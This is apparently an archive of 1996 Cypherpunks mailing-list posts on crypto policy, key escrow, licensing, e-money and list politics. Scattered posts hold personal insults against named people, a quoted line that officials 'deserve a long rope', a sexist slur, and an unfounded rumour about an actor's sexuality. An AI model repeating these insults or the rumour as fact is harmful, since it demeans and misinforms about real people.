>how things ought to be. 

The message that UKWeb sends with the SafePassage beta userid/password is
incorrect - not because it makes any of the assumptions you're ascribing to
UKWeb and license writers, but because the license itself fails to require
the person who agreed to it to keep the userid/pw combination confidential.

But you are entirely off the mark with your assumptions about the
assumptions made by the writer of the license. I am the person who wrote
the license. (Actually, I modified some pre-existing license text, merged
some in from another source, and generally did the sort of copying &
pasting that's considered perfectly acceptable in the legal field and is
considered copyright infringement if a programmer does it.) And I made no
such assumption. And I know enough about how the Internet works to laugh at
anyone says they "really understand how the Internet works." (Hint: before
and during law school, I worked as a consultant to ISP's who needed
technical assistance.) 

You would do well to heed your own advice and learn something about law
before making grand statements about "how [things] work". UKWeb does not
enter into an agreement with anyone (or everyone) who receives E-mail. It
enters into an agreement with the person who fills out the form to download
the software. People and organizations who haven't filled out the form
don't have an agreement with UKWeb to use the software; and absent that
agreement, their use isn't legal. 

I'm not interested in turning this molehill into a mountain. The beta test
of the software is unwittingly functioning as a beta test of the license
document; this morning's message revealed something I missed when I worked
on the license agreement. It will be corrected shortly. 

(This seems to be as good a time as any to announce that I'm now one of the
Cpunks who's working at C2Net.) 

--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.
                            | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 27 Nov 1996 18:20:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Counterproductive Dorothy Denning Flames
In-Reply-To: <199611271810.KAA02393@netcom17.netcom.com>
Message-ID: <giw3XD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


mpd@netcom.com (Mike Duvos) writes:

> William H. Geiger III writes:
>
>  > Dorthy Denning is a boot-licking fasicist!!!
>
>  > William Reinsch is a lying bastard. Fucking politions!!
>  > Fucking goverment!! They all deserve a long rope!!
>
> It is perhaps a point in Dr. Denning's favor that her most
> vitriolic detractors can spell neither "Dorothy" nor "fascist".

Yes. On the Internet it may not be immediately evident that the other side
of the debate is represented by clueless juveniles with whom you simply
wouldn't talk in a physical encounter. Trying to explain the need for key
escrow to a 15-year-old self-professed "Libertarian" (or indeed trying to
explain anything about cryptography to a group that collectively claims that
discussions of elliptic curves are "off-topic") is literally throwing pearls
before the swine.

> I must admit that I am at a loss to understand the heat which
> Dorothy Denning generates on the Cypherpunks list, which seems to
> be second only to the heat generated by posting recipes for roast
> feline in rec.pets.cats.

I've seen other people abused on this mailing list - usually, whoever
knows more about cryptography then the regular "lynch mob".

> All of the people I know who have met her find her to be a
> pleasant person, and the occasional Email messages we have
> exchanged have certainly been positive and friendly.  While she
> tends to view the Four Horsemen of the Infocolypse as a bit more
> threatening than the typical Cypherpunk, I don't think her views
> are so extreme as to justify the continuous screams of "crypto
> toady", "government suckup", and "wicked witch" which seem to pop
> up in response to her every utterance.

I had the pleasure of meeting Dr. Denning in person and I asked her
about her views on GAK. Her responses made a lot of sense to me. Most
businesses, if they thought about it, would prohibit their employers
from having information on company computers encrypted so the owner
of the computer can't read them. This is just good business sense.

> I would even go so far as to say that this list would be a lot
> more entertaining if she were contributing to it, and sci.crypt
> is certainly a less interesting place now than it was in bygone
> days when she was posting there.

This mailing list suffers from the presence of several mentally disturbed
juveniles who a) are clearly ignorant of cryptography (e.g. rant about
brute force attacks on OTP); b) are cognizant of their utter ignorance and
stupidity; c) are envious of anyone who does know what s/he's talking
about.

So, they feel compelled to harrass anyone who's smarter / more
knowledgeable than they are (sometimes using the anonymous remailers) in
an effort to drive all intelligent discussion off their "private mailing
list", so ignoramuses like Bradley can sound like "local experts".

The continuing verbal abuse of Dr. Denning is no different from the abuse
previously heaped on Fred Cohen or David Sternlight or yours truly.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Wed, 27 Nov 1996 19:34:49 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Star Trek: First Contact
Message-ID: <199611280334.UAA14254@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 1996, The Deviant <deviant@pooh-corner.com> wrote:
>
>On Wed, 27 Nov 1996, Dr.Dimitri Vulis KOTM wrote:
>
>> Mark Allyn 206-860-9454 <allyn@allyn.com> writes:
>> 
>> > Are any of the characters in the new Star Trek gay?
>> 
>> The bold guy who plays Captain Picard is very gay in real life.
>> (He probably hated all those love episodes with women :-)
>> 
>
>Patrick Stewart is married, isn't he?

So was Rock Hudson.  Let's not forget that in the '50s, Liberace sued
(successfully! - and collected significant monetary damages!) "Confidential"
magazine for implying that he was homosexual.  Not that it makes any
difference at all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 27 Nov 1996 18:12:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Issuers of E-money
Message-ID: <v03007856aec29fb43cc7@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Thu, 28 Nov 96 01:31:21 +0100
To: dcsb@ai.mit.edu
Subject: Issuers of E-money
From: a9050756@unet.univie.ac.at (Mike Alexander)
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: a9050756@unet.univie.ac.at (Mike Alexander)


I'd like to compile a current list of actual Internet-based E-money issuers
and
wich technology they are using; pls. mail me any additions to the list from
the
Cybercash homepage below. I will then post the complete list back here if
it's
long enough.  (info on trials is OK also) THX

American Heritage Bankcard
Banque SOFINCO
Barnett
BayBanks Credit Corporation
Boatmen's Credit Card Bank
Busey Bank
Chittenden Bank
Compass Bank
First Bank of Beverly Hills

Bank of Hawaii

First Bankcard Center
First Hawaiian Bank
First National Bank of Omaha
First Union Corporation
First USA Paymentech

Humboldt Bank

Huntington Bank

Michigan National Bank

National Bank of the Redwoods
Norwest
PNC Bank
Silicon Valley Bank
SouthTrust Bank
Unified Merchant Services / Nationsbank
U.S. Bank
Vantage Services, Inc.
Wells Fargo Bank

Best Regards,

Michael Alexander
Doctoral Student at the University of Vienna

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQCNAzIhxYwAAAEEALtfkL/X6GuZpEECWnmkmbqqtGwNalb94Om82VUiBE8iU1OX
2e5WXQGsq1oManSqVQn3TpVo7VE9pMJr5vITAmkEA6szGRt5zbK5u/dIqhLnJnRE
sVpiY61Xw6RvQKoXX7LSqOYSCqvIiY8GJ5gRpiKQNPZVuJRqbLipmU0fPqylAAUR
tDFNaWNoYWVsIEYuIEFsZXhhbmRlciA8YTkwNTA3NTZAdW5ldC51bml2aWUuYWMu
YXQ+iQCVAwUQMiHFjbipmU0fPqylAQGy4QP+LjB6lZXVYFZDpoVB7j8AGvkghSsr
XicZapXPmsFX6xpt+S29EF4DGoDJIDq6VLJMZ2rQ1gFfEvvWzL7ekZ3orhLSpJoO
WWRZF1MNZVWBNhzxBcdK2T6yrx4cBwQX7t299Ho0y1Go69VE9e3LN8YInIXoQYp5
bc4M0u16GqmV5eI=
=5l49
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 27 Nov 1996 18:00:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: NYC area Cpunks  Meeting?
In-Reply-To: <3.0.32.19961127155830.00688ce8@popd.ix.netcom.com>
Message-ID: <6wy3XD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Marc J. Wohler" <mwohler@ix.netcom.com> writes:
>
> NYC area Cpunk's,
>
> I have obtained a meeting place on the upper west side of Manhattan.
> It is available on Tuesday or Thursday 12/17 or 12/19.
> What would be your interest in a meeting (party?).

I might be interested, although I do _not_ consider myself a "cypherpunk".

> Ideas & suggestions for agenda-speaker-entertainment?

"Timmy May and his sexual perversions."

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 27 Nov 1996 18:00:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Star Trek: First Contact
In-Reply-To: <Pine.LNX.3.94.961128014103.7011A-100000@random.sp.org>
Message-ID: <g1y3XD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


The Deviant <deviant@pooh-corner.com> writes:
> >
> > > Are any of the characters in the new Star Trek gay?
> >
> > The bold guy who plays Captain Picard is very gay in real life.
>
> Patrick Stewart is married, isn't he?

To a man or a woman?

Meeeeauw!
Meeeeauw!
Meeeeauw!
Meeeeauw!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 27 Nov 1996 18:10:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hurray!  A good example of rational thinking ...
In-Reply-To: <199611272000.MAA18790@server1.chromatic.com>
Message-ID: <c4y3XD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua <hua@chromatic.com> writes:
>                                                             It would
> be a great disservice to the cause if cypherpunks were, in the minds
> of the public, tightly associated with the likes of Timothy McVey.

Or Timothy C. May (fart), a clueless moron totally ignorant of cryptography.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 27 Nov 1996 18:12:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Star Trek: First Contact
In-Reply-To: <01BBDC71.A4889410@crecy.ai.mit.edu>
Message-ID: <g6y3XD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Phillip M. Hallam-Baker" <hallam@ai.mit.edu> writes:
> Actually the opposite is the case, he is a notorious womanizer.

Are _you gay, Phil?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 27 Nov 1996 20:16:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Is /dev/random good enough to generate one-time pads?
Message-ID: <199611280345.VAA22700@algebra>
MIME-Version: 1.0
Content-Type: text


Subj sez it all.

Thank you.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Wed, 27 Nov 1996 19:47:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hurray! A good example of rational thinking ...
In-Reply-To: <199611280144.RAA19906@server1.chromatic.com>
Message-ID: <199611280501.XAA06603@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199611280144.RAA19906@server1.chromatic.com>, on 11/27/96 at 09:44 PM,
   Ernest Hua <hua@chromatic.com> said:


>> > It is truly counter-productive to insist on conspiracy theories and
>> > anti-government rhetoric.  Sure, there have been conspiracies in the
>> > past.  Sure, there have been more than our fair share of atrocities.
>>
>> > However, the real issues are privacy, security, freedom of speech, and
>> > effective policy enforcement.  When we start calling names like "jack
>> > booted thugs" and the like, we are sinking to the same low levels that
>> > Freeh and (more appropriately) Gorelick use when they cry wolf and
>> > foretell futuristic electronic meltdowns.
>>
>> > More importantly, while the public is cynical and skeptical, it isn't
>> > exactly embracing the right-wing militia movements either.  It would
>> > be a great disservice to the cause if cypherpunks were, in the minds
>> > of the public, tightly associated with the likes of Timothy McVey.

>> Not at all. We need more people shouting from the mountain tops at
>> what are governments are doing.

>I do believe we need to get more visibility on the seriousness of the
>issues.  I don't think the average person understands why it was so
>hard to conspire against the people before the telecommunications age,
>and why it "could" (not necessarily "would") be now.

>There is a lot of knowledge to pass on before someone can truly
>appreciate the extent of the need for privacy and freedom protections.
>While it is bad that the extent of the body of knowledge turns off
>most people's willingness to learn, the sheer vastness of the task of
>setting up this infrastructure also makes it very difficult for the
>NSA or any other agency to become the secret puppet master.

>Not that they have not been trying.

>But to accuse them of necessarily harboring evil purposes is not only
>counter-productive, but most probably incorrect.  Most public sector
>servants are not the New World Order loonies that the militia's have
>been prepared to fight.  It would be safe to say that the NSA, the CIA
>and the FBI are filled with mostly red-blooded Americans with solid
>allegiance to the basic principles which you and I cherish.

Hate the sin but not the sinner? :)

It really is irrelavent weather the reduction in freedoms is cause by "evil conspiritors"
or "well intentioned patriots". The end result is the same. When you wake-up one day and
find that every thing you say & everything you do falls under the watchfull eye of "Big
Brother" will you really care how things got that way?

>The questions is, why have 3 branches of government?  Why have
>multiple conflicting agencies for any given task or goal?  Why not
>just choose a "good guy" once and for all and let him (or her) do the
>"right thing"?  It's not that we don't trust him when we first elect
>him.  It's a question of what he would do with that power?  And those
>that succeed him?

>That is why we don't "just trust them".

>It's too bad that we can't hold Reagan responsible for Iran-Contra
>just because he's presiding over the executive branch at the time.
>After all, we expect him to be responsible (whether he knew about it
>or not).  Why not drop all these stupid laws that PREVENT the citizens
>from suing the government for incompetence?

>> We are not as free as we were 10yrs ago. We are not as free as we
>> were 100yrs ago. Hell we are not as free as we were under King
>> George over 200yrs. ago!!

>I seriously doubt you "long" for the King George days.  If you do,
>well, we are just not in the same universe.

>> The issue of cryptology is only one area of attack on our
>> freedoms. Just one small piece in the Big Picture. Below are some of
>> the some of the trends we have to look forward to:
>>
>> National ID's:
>> Tracking of movement of all citizens:
>> Display of documentation for all Public transport:
>> Display of documentation for Employment:
>> Electronic Cash:
>> Automated Drift-Net Fishing of Phone conversations:
>> Federal Thought Crimes:

>Have you ever consider the possibility that maybe ... just maybe ...
>the government really IS as incompetent as it is reputed to be?

I'v worked with them I KNOW they are. :)

>Consider this ...

>If you were a know-nothing beaurocrat, how would you run a large
>institution?  Top-down?  Probably.  Gather as much info as you can?
>Of course.  Require that everyone trust your judgement (a la
>"executive priviledge")?  Naturally.  If there were guaranteed
>political opposition, no matter what you do, would you just push
>for more power/priviledge/money in everything you do?  Damn right!
>Especially if you don't know how many of these things you push for
>will be won ...

>Oh, and there is this minor problem with some of these methods
>clashing with the Constitution ...  Oh bother!

>I'm simply saying that it natural for the branch of the government
>primarily responsible for law enforcement and national security to
>care deeply about that side of any issue.  If I were president, I
>would play the same political games Clinton is playing.  A president
>is not just responsible for the specific free speech of programmers or
>specific privacy rights of individuals.  He is responsible for a much
>bigger picture.  It just so happens that, in our nation, we value
>"individual" liberty much more than anything else (including anybody
>else's "big picture").  Therefore, there are a lot of people against
>the more obvious methods of invasion of privacy.  But let's face it,
>the public just isn't very informed or consistent on the topic; it is
>just easily swept up in hysteria.

See this is where you & I part ways. It is a Presidents responciblity as it is the
responcibility of all civil servants wether elected or appointed or hired. They all take
an oath of office To protect & defend the Constitution against all enemies foriegn &
domestic ... Not the country, not the "big picture", not the current establishment but the
Constitution. The cornerstone that the Constitution is built on is that the People are in
charge. Not the FBI, not the NSA, not the CIA, not the Joint Cheifs but the People. It
also says that the power of the governmnet is limited, they can only do so much and no
more. All rights & powers not explicitly given to the goverment belong to the People. This
doesn't mean that well if we have a really good reason or if we lie real good about it we
can over step out authority. NO it means what it says only this and no more!! Big Picture
be damed!! I doubt that the People would take much comfort know that they had all been
sold into slavery but it was necisary for the Big Picture.

>> I was born a free man, in charge of my destiny, with inalienable
>> right endowed by my creator. I will not be made a slave of the state
>> but will fight and die a free man.

>You were born to your mother and father, who are members of a society
>which has long built up imperfect infrastructures for surviving and
>thriving on the land which it depends.  If you were alone in the vast
>American plains, you can claim you have infinite rights, and no one
>would disagree with you.  You, your mother, your father, make
>trade-offs everyday on your purest rights versus your practical
>rights.  Your purest rights are mostly given lip service, and then
>where it matters more, protected by gentlemen's agreements, sometimes
>backed by force.  But the right itself is not enforced by any real
>means.  It is the threat of punishment that keeps the right from being
>violated.

I never claimed infinite rights I claimed inalienable rights there is a difference.
Infinite rights implies rights without ends. Inalienable rights implies rights that can
not be taken away. They are my rights reguardless of the efforts of petty would be
dictators or government bureaucrats. They may conduct them selfs in a manor that violate
my rights but that does not mean that I no longer have those rights. 

>Cryptography is one of those interesting areas where, for once, man
>can prove, for all practical purposes, that there is a hard limit
>somewhere that he can draw.  More importantly, it is also genuine
>protection of a "right", specifically, a right to privacy, which
>society previously protected using the old methods (threat of
>punishment).

>Imagine a line in the sand ... if you cross it, someone shoots you in
>the leg.  You can still cross it, but you'll suffer the consequences.
>With cryptography, you cannot cross it, no matter what you do.  This
>brings into question whether or not it was useful (to you and to
>society) to shoot you MOST of the time, but not if you present a good
>reason to cross it first.

>THIS is the interesting part of all of this.  I don't like to see this
>issue drowned out by all the conspiracy talk (which no one on this
>list is in any position of proving or fixing unilaterally).

I never claimed any "conspiracy". No mention of the Tri-Lateral Commision or New World
Order. :)

I am just pointing out what is happening here and now. Our elected officals, appointed
officers, and government employes are disregarding the Constitution and violating out
rights. I could care less why. I want it stoped and stoped now. I will do what ever is
nessicary to inform others that this is happening and hopefully convince them that this
should stop. If some one steals your car do you really car if it was a lone "crack head"
that did it or an orginized criminal cospiracy (MOB) that did it? It is wrong, it is
illegal, and it must stop.

- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------
 
*MR/2 ICE: I don't do Windows, but OS/2 does.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMpz+CI9Co1n+aLhhAQFYpgQAmp1UmeUCLQENaiDq1F8gu/LnEsOKYhHK
nCsLcgKe4juFeti/I65a3XEymG2M2MxNqLkBiM5FHEKtAjcUeaBXYpiGaQP/PEaw
fD7ZkpSMBJhVdUXsxZG4+ZIBu6EFrx6MMGM1Bzk7tuAd7tK8tjdpDb2CKg7tFCmp
+OH+nRjGrvc=
=8uXk
-----END PGP SIGNATURE-----
 
*MR/2 ICE: I smashed a Window and saw... OS/2.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@adsl-122.cais.com>
Date: Wed, 27 Nov 1996 19:34:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: DSP's & crypto
Message-ID: <9611280334.AA01875@adsl-122.cais.com>
MIME-Version: 1.0
Content-Type: text



About a year or 2 ago I read some stuff in sci.crypt about
some people doing encryption stuff, I belive with DES, using
DSP chips, I am interested in finding the folks who were working
on it, or related code. If anyone out there has that sort of info
I would appreciate some pointers in their direction.

Thanks,

Tim Scanlon







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Wed, 27 Nov 1996 20:41:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Counterproductive Dorothy Denning Flames
In-Reply-To: <giw3XD10w165w@bwalk.dm.com>
Message-ID: <199611280555.XAA07103@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <giw3XD10w165w@bwalk.dm.com>, on 11/27/96 at 08:57 PM,
   dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) said:

>I had the pleasure of meeting Dr. Denning in person and I asked her
>about her views on GAK. Her responses made a lot of sense to me. Most
>businesses, if they thought about it, would prohibit their employers
>from having information on company computers encrypted so the owner
>of the computer can't read them. This is just good business sense.

<sigh> GAK - Government Access to Keys and corporate control of encryption procedures &
keys are two completely different issues. This is just more smoke and mirrors to cloud &
confuse the issue. There are many solutions currently available for a company to handle
the encryption of their data including the use of "master keys" to prevent data loss (an
option available even with PGP). Government mandated infrastructure of GAK is unnecessary
and unwarranted for such purposes.

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
*MR/2 ICE: What I like about MS is its loyalty to customers!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: varange@crl.com (Troy Varange)
Date: Wed, 27 Nov 1996 22:54:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Difference Between The Right And Left
Message-ID: <Love@22594>
MIME-Version: 1.0
Content-Type: text/plain


	The French Revolution perhaps provided the best
	definition as the origional coiners of the terms.

	The Left is for radical change and the Right is for
	evolutionary change.

	That would put mainstream politics decidedly on the right
	wing side of the political spectrum.

	The left wing is a rather motly collection including many
	anarchists, communists and nazis, yet many of the same
	types are decidedly right wing.

	A historical anecdote would be the Bucharin-Rykov wing of
	the Bolshevik party in the late twenties. They were right 
	wing while Stalin was left wing.  Yet, Bucharin would be
	considered quite radical for today's bean counting
	politics.

	This is, of course, confusing to y'all because your all a
	bunch of stupid college kids.

-- 
Cheers!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 27 Nov 1996 21:07:33 -0800 (PST)
To: dthorn@gte.net (Dale Thorn)
Subject: Re: IQ and age
In-Reply-To: <329CFFB7.E37@gte.net>
Message-ID: <199611280447.WAA23636@algebra>
MIME-Version: 1.0
Content-Type: text


Dale Thorn wrote:
> The biggest influence on IQ are the so-called "engrams" (fears, super-
> stitions, anxieties, etc.) planted in your brain early in life.
> 
> Some of this can be overcome with mental exercise, and awareness of what
> negative influences are holding you back.  Much easier said than done!
> 
> IQ as they attempt to measure it can probably be most easily explained
> as pattern matching skills. Unfortunately for testing, and although you
> can be every bit as intelligent at 70 as at 10, your pattern-matching
> skills change and evolve over time, so any given tests will only apply
> (more or less) at the age group they are optimized for.
> 

Would you dismiss strong correlations between IQ and success in life 
and academia as something irrelevant?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robin Whittle" <firstpr@ozemail.com.au>
Date: Wed, 27 Nov 1996 03:55:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dorthy Denning is a boot-licking fasicist!!!
Message-ID: <199611271154.WAA26338@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


William H. Geiger III <whgiii@amaranth.com> wrote:

> Dorthy Denning is a boot-licking fasicist!!!

> Dorthy Denning gave the most pro-government speech I have ever
> heard. Is this clueless bitch on the government payroll?!!

Spelling please!  "Dorothy".  She is a US academic.

It may be emotionally satisfying to rail against (what for us may be
evident as) the wickedness and stupidity of our opponents.

I did not see the testimony, so I can't comment on it.

However I believe that Dorothy Denning is motivated as much as many of
us by the desire for a healthy society.  The sharp difference in
crypto policy can probably be explained by a differing understanding
of:

1 - The likely behaviour of professional criminals, normal people,
    government officials and criminal government officials in the
    future with various forms of crypto system.

2 - Different levels of trust and fear regarding crime in general,
    big-time crime in particular and the use and abuse of law 
    enforcement and other government powers.

3 - Probably other things too.


I think that there are different personality types at work here. 
Adding to that is the tendency for governments to employ people who
generally trust governments, their desire to perpetuate their former
abilities to detect and deter crime and especially the problem of
*groupthink*.

Groupthink is the tendency for like minded individuals to reject
uncomfortable notions, and so develop a seriously inadequate
understanding of reality.

JFK admitted they were stupid to commence the Bay of Pigs invasion. 
Clinton will probably say the same thing about crypto export controls.

There is clear evidence that, being surrounded by like minded 
advisers, both presidents were the victims of groupthink.

If we nod our heads to "Dorthy Denning is a boot-licking fasicist!!!"
then we too are succumbing to groupthink.

See:

   http://www.ozemail.com.au/~firstpr/crypto/oecd_dr.htm

for Dorothy Denning's response to my challenge for justifying costs of
key-escrow/recovery against the likely benefit in crime reduction. I
don't think it is a very strong response, and while many on this list
will know more about her than I do, her response does not strike me as
the work of someone who is unintelligent, uninterested in the future
of society or a fascist.

The net result of various misunderstandings (such as Clinton and Co.
must have about the freely available nature of strong crypto) may well
be stupidity on a grand scale.

There are personality types who lean away from privacy and towards
dangerous levels of government control.  I think this can be amplified
by the circumstances in which these people work - and groupthink is a
big part of that.  

oecd_dr.htm is a recent draft of some OECD crypto work, with my
comments, especially concerning the likely behaviour of criminals
communicating both with other criminals and with non-criminals.  It
also has some information on an essay by Irving L. Janis called "Group
Think" which I recommend to everyone who is involved in policy
debates.

- Robin





. Robin Whittle                                               .
. http://www.ozemail.com.au/~firstpr   firstpr@ozemail.com.au .
. 11 Miller St. Heidelberg Heights 3081 Melbourne Australia   .
. Ph +61-3-9459-2889    Fax +61-3-9458-1736                   .
. Consumer advocacy in telecommunications, especially privacy .
.                                                             .
. First Principles      - Research and expression - music,    .
.                         music industry, telecommunications  .
.                         human factors in technology adoption.
.                                                             .
. Real World Interfaces - Hardware and software, especially   .
.                         for music                           .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 27 Nov 1996 20:47:34 -0800 (PST)
To: tz@execpc.com
Subject: Re: wealth and property rights
In-Reply-To: <Pine.LNX.3.95.961127145308.1948B-100000@deimos.ceddec.com>
Message-ID: <199611280504.XAA01800@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



tz@execpc.com:
> I am left to the terrible justice of my own choices.

     That is a .sig line, for my other account.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 27 Nov 1996 20:22:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Israel crypto restrictions
In-Reply-To: <199611280046.TAA18800@homeport.org>
Message-ID: <R053XD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> writes:
> 	They're listed on NASDAQ (CKP).  This makes them an American
> company for purposes of export controls.  (This from an employee of
> Checkpoint who I asked that exact question.)

This is truly bizarre. First, if they were on the NASDAQ, they'd have a
4-letter ticker symbol, not a 3-letter symbol. MSFT (Microsoft) is on NASDAQ.
IBM (IBM) and F (Ford) are on the New York stock exchange and/or
American stock exchange.

Sometimes the stock of a foreign company is traded in the U.S. in the form
of American Depository Receipts (ADRs) not sponsored by the company. How
could that impose any obligation on it?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 27 Nov 1996 20:20:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: TV/Radio: Crypto Policy on NPR
In-Reply-To: <199611272353.PAA04644@ohio.chromatic.com>
Message-ID: <3i63XD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua <hua@chromatic.com> writes:

> McNeil & Lehear (sp?)  (ok, I know, one of them is gone, but I forgot
> which) News Hour had a segment on crypto policy.  Generally a balanced
> non-technical report, except that there is no mention of the free
> speech issue.

Do you think they should have mentioned that cypherpunks are against free
speech and that John Gilmore (spit) is a liar and a content-based censor?

Gilmore is irrelevant and not worth mentioning.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 27 Nov 1996 21:04:11 -0800 (PST)
To: jbugden@smtplink.alis.ca
Subject: Re: Counterproductive Dorothy Denning Flames
In-Reply-To: <9610278491.AA849142344@smtplink.alis.ca>
Message-ID: <199611280521.XAA01849@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> mpd@netcom.com (Mike Duvos) wrote:
>>It is perhaps a point in Dr. Denning's favor that her most
>>vitriolic detractors can spell neither "Dorothy" nor "fascist".
>>I must admit that I am at a loss to understand the heat which
>>Dorothy Denning generates on the Cypherpunks list
>It should not surprise you too much, as people have often vilified those th=
> ey
> disagree with.=20
> The more you accept the other person as a human being, the more difficult it
> becomes to dismiss their view without first confronting the issues. It's ea=
> sier
> to treat them as an idiot, and then their views becomes idiotic by associat=
> ion.

     I don't think anyone believes Denning is an Idiot. Maybe that her
